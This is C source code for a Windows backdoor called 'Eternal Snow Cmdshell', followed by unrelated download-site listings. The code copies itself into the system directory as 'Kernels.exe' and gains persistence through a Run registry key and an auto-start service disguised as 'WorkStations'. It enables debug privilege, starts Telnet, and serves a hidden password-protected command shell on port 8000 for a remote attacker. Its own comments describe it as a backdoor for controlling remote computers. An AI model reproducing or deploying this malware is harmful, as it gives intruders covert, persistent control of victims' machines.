/*
Delphiscn Eternal Snow Cmdshell Version 1.0
This Backdoor is written by Delphiscn.It is support for Windows NT/2000/XP/2003.
You can use a nc to control a remote computer which is runing with this software.
Complied and Tested in Windows XP SP2 CN 2000/2003 NOT TESTED.
Can not run in Windows 98/ME
Details
Eternal snow will create a service(Workstations) on the Remote System. And Bind Service Computer on port 8000.
Then.It will also Try to Start Telnet Service in the Remote System which is support for NT.
An Attacker can control it IF he konw the password --Neverland.
Referrence
1.msdn
2.www.xFocus.org
More Information
Delphiscn@www.EvilOctal.com
cnBlater(at)hotmail(dot)com
http://spaces.msn.com/members/delphiscn
2005-08-15*/
#include<winsock2.h>
#include <stdio.h>
#include <stdlib.h>
#include <windows.h>
#include <winsvc.h>
#include <Psapi.h>
#pragma comment( lib,"Psapi.lib")
#pragma comment(lib, "ws2_32.lib")
#define password "Neverland"
BOOL reg(char *szExecFile);
void OnCreate();
void StartTelnet();
void Help();
BOOL reg(char *szExecFile)
{
HKEY hKEY;
LPCTSTR data_Set="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\";
long snow0=(::RegOpenKeyEx(HKEY_LOCAL_MACHINE, data_Set, 0, KEY_ALL_ACCESS,&hKEY));
if(snow0!=ERROR_SUCCESS) return(false);
LPBYTE username_Get=(unsigned char*)malloc(sizeof(BYTE)*80);
DWORD cbData_1=80;
DWORD dwType;
long snow1=::RegQueryValueEx(hKEY,"Dlls", 0,&dwType, username_Get,&cbData_1);
if(snow1!=ERROR_SUCCESS)
{
DWORD setsize;
setsize=strlen(szExecFile)+1;
dwType=REG_SZ;
long snow3=::RegSetValueEx(hKEY,"Kernels", 0, dwType, (const unsigned char*) szExecFile, setsize);
if(snow3!=ERROR_SUCCESS) {return(false);}
}
free(username_Get);
::RegCloseKey(hKEY);
return(true);
}
int EnablePrivilege(LPCTSTR lpszPrivilegeName,BOOL bEnable)
/*
Thanks to Sunlion[E.S.T]
*/
{
HANDLE hToken;
TOKEN_PRIVILEGES tp;
LUID luid;
if(!OpenProcessToken(GetCurrentProcess(),TOKEN_ADJUST_PRIVILEGES |
TOKEN_QUERY | TOKEN_READ,&hToken))
return 0;
if(!LookupPrivilegeValue(NULL, lpszPrivilegeName, &luid))
return 1;
tp.PrivilegeCount = 1;
tp.Privileges[0].Luid = luid;
tp.Privileges[0].Attributes = (bEnable) ? SE_PRIVILEGE_ENABLED : 0;
AdjustTokenPrivileges(hToken,FALSE,&tp,NULL,NULL,NULL);
CloseHandle(hToken);
return 0;
}
void Help()
{
printf("Eternal Sonw Cmdshell in Windows NT System Support For 2000/XP/2003 Version 1.0\n");
printf("CODE BY Delphiscn@www.EvilOctal.com E-mail:cnBlaster(at)hotmail(dot)com\n");
printf("Complied in Windows XP SP2 CN 2005-08");
return;
}
int main(int argc,char *argv[])
{
GetModuleFileName(NULL,argv[0],255);
char szNewPlace[255];
GetSystemDirectory(szNewPlace,255);
strcat(szNewPlace,"\\Kernels.exe");
if( strcmp(argv[0],szNewPlace) != 0 )
{CopyFile(argv[0],szNewPlace,FALSE);}
if(!reg(szNewPlace))
{return 0;}
OnCreate();
StartTelnet();
system("cls.exe");
Help();
WSADATA wsaData;
char buff[4096];
int Eternal;
if ((Eternal = WSAStartup(MAKEWORD(2,2), &wsaData)) != 0)
{
printf("WSAStartup Failed: %d\n",Eternal);
return -1;
}
int port=8000;
int RemoteServer,LocalClient;
struct sockaddr_in addrServer,addrClient;
char *MSG="\n\r Welcome Hacker";
char *getpass="\r\n Your Password is:";
char *passok="\r\n ok";
char *error="\r\n Error Password Please Try it again";
RemoteServer=socket(AF_INET,SOCK_STREAM,0);
addrServer.sin_family=AF_INET;
addrServer.sin_port=htons(port);
addrServer.sin_addr.s_addr=ADDR_ANY;
int TimeOut=50000;
setsockopt(RemoteServer,SOL_SOCKET,SO_RCVTIMEO,(char*)&TimeOut,sizeof(TimeOut));
UINT bReUser=1;
setsockopt(RemoteServer,SOL_SOCKET,SO_REUSEADDR,(char*)&bReUser,sizeof(bReUser));
bind(RemoteServer,(struct sockaddr*)&addrServer,sizeof(addrServer));
listen(RemoteServer,5);
printf("Bind Server is OK\n%d",port);
int iLen=sizeof(addrClient);
LocalClient=accept(RemoteServer,(struct sockaddr*)&addrClient,&iLen);
if (LocalClient != INVALID_SOCKET)
{
int iTimeOut=50000;
setsockopt(LocalClient,SOL_SOCKET,SO_RCVTIMEO,(char*)&iTimeOut,sizeof(iTimeOut));
}
else return -1;
send(LocalClient,MSG,strlen(MSG),0);
send(LocalClient,getpass,strlen(getpass),0);
recv(LocalClient,buff,1024,0);
if(!(strstr(buff,password)))
{
send(LocalClient, error, strlen(error), 0);
printf("\r\n PassWord ERROR!");
closesocket(LocalClient);
}
send(LocalClient, passok, strlen(passok), 0);
HANDLE hReadPipe1,hWritePipe1,hReadPipe2,hWritePipe2;
unsigned long lBytesRead;
SECURITY_ATTRIBUTES sa;
sa.nLength=12;
sa.lpSecurityDescriptor=0;
sa.bInheritHandle=TRUE;
CreatePipe(&hReadPipe1,&hWritePipe1,&sa,0);
CreatePipe(&hReadPipe2,&hWritePipe2,&sa,0);
STARTUPINFO siinfo;
char cmdLine[] = "Kernels.exe";
PROCESS_INFORMATION ProcessInformation;
ZeroMemory(&siinfo,sizeof(siinfo));
siinfo.dwFlags = STARTF_USESHOWWINDOW|STARTF_USESTDHANDLES;
siinfo.wShowWindow = SW_HIDE;
siinfo.hStdInput = hReadPipe2;
siinfo.hStdOutput = siinfo.hStdError = hWritePipe1;
printf("\r\n Pipe Create OK!");
int bread = CreateProcess(NULL,cmdLine,NULL,NULL,1,0,NULL,NULL,&siinfo,&ProcessInformation);
while(1)
{
int ret = PeekNamedPipe(hReadPipe1,buff,1024,&lBytesRead,0,0);
if(lBytesRead)
{
ret = ReadFile(hReadPipe1,buff,lBytesRead,&lBytesRead,0);
if(!ret) break;
ret = send(LocalClient,buff,lBytesRead,0);
if(ret <= 0) break;
}
else
{
lBytesRead = recv(LocalClient,buff,1024,0);
if(lBytesRead <= 0) break;
ret = WriteFile(hWritePipe2,buff,lBytesRead,&lBytesRead,0);
}
}
closesocket(LocalClient);
closesocket(RemoteServer);
return 0;
}
void OnCreate()
{
char szNewPlace[255];
GetSystemDirectory(szNewPlace,255);
strcat(szNewPlace,"\\Kernels.exe");
EnablePrivilege(SE_DEBUG_NAME,TRUE);
SC_HANDLE scm;
SC_HANDLE scv;
scm=::OpenSCManager(NULL,NULL,SC_MANAGER_ALL_ACCESS);
if (scm!=NULL)
{
scv=::CreateService(scm,
"WorkStations",
"WorkStations",
SERVICE_ALL_ACCESS,
SERVICE_WIN32_OWN_PROCESS,SERVICE_INTERACTIVE_PROCESS,
SERVICE_AUTO_START,
SERVICE_ERROR_IGNORE,
szNewPlace,
NULL,NULL,NULL,NULL);
if (scv!=NULL)
{
::CloseServiceHandle(scv);
}
else
{
::CloseServiceHandle(scm);
}
}
}
void StartTelnet()
{
EnablePrivilege(SE_DEBUG_NAME,TRUE);
SC_HANDLE scm;
SC_HANDLE scv;
scm=::OpenSCManager(NULL,NULL,SC_MANAGER_ALL_ACCESS);
if(scm!=NULL)
{
scv=::OpenService(scm,"Telnet",SERVICE_ALL_ACCESS);
if (scv!=NULL)
{
::StartService(scv,0,NULL);
::CloseServiceHandle(scv);
}
::CloseServiceHandle(scm);
}
}
/*
Complied with Visual C++.Net
Good Luck ^.^
*/
分享到:
相关推荐
eternal spu 1.41 音频插件 放入plugins文件夹即可
Microsoft.VP9VideoExtensions_1.0.50481.0_x64__8wekyb3d8bbwe.Appx.appx
GEB-EGB《哥德尔 艾舍尔 巴赫:集异璧之大成》的英文版,打好目录标签
Hello friends, nice to meet u. I am here to make friends. Please drop me a message.
E015-渗透测试常用工具-使用Eternal Blues进行Windows漏洞利用
Go round the Earth at a colorful space ship, you will see the eternal blackness of space with bright patches of stars. Fantasy Moon 3D Screensaver v1.3 build 5 3D screensaver with full moon, ...
justice_eternal.apk
哥德尔、艾舍尔、巴赫——集异壁之大成Godel Escher Bach--an Eternal Golden Braid(高清中英文版)
windows worm nsa eternal rock
SAVE FILE FOR DOOM ETERNAL CODE
<?xml version="1.0" encoding="UTF-8"?> maxElementsInMemory="10000" !-- 缓存最大数目 --> eternal="false" !-- 缓存是否持久 --> overflowToDisk="true" !-- 是否保存到磁盘,当系统当机时-->...
cmd代码: 到memcached根目录 1、安装:memcached.exe –d install 2、启动:memcached.exe -d start 此时memcached已经注册为开机启动服务完成安装。 使用参数: -p 监听的端口 -l 连接的IP地址, 默认是本机 -d ...
**更新设置3 **扩展程序将突出显示Eternal导入/导出格式的所有卡,并将其转换为链接,同时保留可导入格式。 要更改图像的显示尺寸,请导航至chrome:// extensions或插件的下拉菜单,然后选择选项。 巨大的呐喊声给...
巴黎永恒延伸 此扩展程序向您显示《巴黎永恒》在《守望先锋》联赛中的比赛...在Twitter https://twitter.com/ParisEternal和Instagram https://www.instagram.com/pariseternal/上关注Paris Eternal 支持语言:Français
SamPT的idSaveDecompressor v0.1 用于解压缩DOOM Eternal保存的游戏文件(game_duration.dat)的工具。 请注意:当前无法压缩并重新导入您的保存。 我们将在确定格式后立即添加该功能-如果您对此有所帮助,请与...
资源来自pypi官网。 资源全名:celery_eternal-0.1.0-py2.py3-none-any.whl
语言:English iptv解决方案可为您提供最新流行的个性化电视服务:IPTV,视频点播(VoD),OTT。 以低廉的价格向客户提供娱乐服务,每月只需10美元。 永恒的IPTV是世界上最好的IPTV之一。 我们以合理的价格在全球范围...
Eternal Terminal 一个远程shell,在不中断会话的情况下自动重新连接